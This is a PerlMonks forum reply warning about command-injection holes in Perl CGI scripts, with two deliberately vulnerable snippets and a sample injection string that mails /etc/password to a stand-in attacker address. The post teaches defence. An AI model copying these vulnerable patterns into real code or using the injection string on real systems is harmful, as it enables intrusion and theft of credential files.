The most brutal example of this and an injection attack hole I can think of would be something like: 

 | 
 | handwaving of HTML here...
 |
<p>
Type in the address you want to look up
<input type="text" name="host_to_search_rq"> 
</p>
 |

[download]
with the CGI of 
#
# Stuff left out.... 
my $hostname=$cgi->param('host_to_search_rq'); 
system("nslookup $hostname"); #BAD!!! BAD!!! BAD!!!
#
#

[download]

First off it is concievable that the malicious hax0r has partially compromised your system already and has a script of their own named "nslookup" sitting in your path so you want to only invoke shell commands within your CGI using fully qualified pathnames to commands. That still doesn't fully get you off the hook, but it is a good start.

Secondly, having not checked the contents of $hostname and blindly executing the query leaves you open to an injection attack. A malicious induhvidual could enter the string ";cat /etc/password | /usr/ucb/Mail hax0rRus@hax0r.org" which then sends them the contents of your /etc/password file for a future brute force attack.

Another Dumb Idea® that I've actually seen folks do: 

|
|   Much handwaving again...
|
if (! $cgi->param('command_rq') ) {
   
   print $cgi->p("input a command: ",
                $cgi->text(-name=>"command_rq") );
} else {

     # OH MY GOD!!! DON'T DO THIS!
     open PIPE,$cgi->parma('command_rq') . "|" 
            or die $!;
     my @results = <PIPE>
     print $cgi->pre(@results);

}

[download]

Talk about asking for trouble!

Just a few ways to crash and burn in the world of CGI....

Just remember, the web is not the "village" it used to be any more. It has grown up into a very large urban area with hookers and muggers on quite a few of the street corners. You would use caution if you had to walk through someplace like that in the Real World™ and you certainly wouldn't leave your doors unlocked there or put valuables out on the front porch. If you can think of a way to break your own security (and your should try and think of ways) someone else can too.

Peter L. Berghold -- Unix Professional
Peter -at- Berghold -dot- Net; AOL IM redcowdawg Yahoo IM: blue_cowdawg

In reply to Re^3: Structing a Web site and security issues by blue_cowdawg
in thread Structuring a Web site and security issues by bradcathey

Title:
Use:  <p> text here (a paragraph) </p>
and:  <code> code here </code>
to format your post, it's "PerlMonks-approved HTML":


  • Posts are HTML formatted. Put <p> </p> tags around your paragraphs. Put <code> </code> tags around your code and data!
  • Titles consisting of a single word are discouraged, and in most cases are disallowed outright.
  • Read Where should I post X? if you're not absolutely sure you're posting in the right place.
  • Please read these before you post! —
  • Posts may use any of the Perl Monks Approved HTML tags:
    a, abbr, b, big, blockquote, br, caption, center, col, colgroup, dd, del, details, div, dl, dt, em, font, h1, h2, h3, h4, h5, h6, hr, i, ins, li, ol, p, pre, readmore, small, span, spoiler, strike, strong, sub, summary, sup, table, tbody, td, tfoot, th, thead, tr, tt, u, ul, wbr
  • You may need to use entities for some characters, as follows. (Exception: Within code tags, you can put the characters literally.)
            For:     Use:
    & &amp;
    < &lt;
    > &gt;
    [ &#91;
    ] &#93;
  • Link using PerlMonks shortcuts! What shortcuts can I use for linking?
  • See Writeup Formatting Tips and other pages linked from there for more info.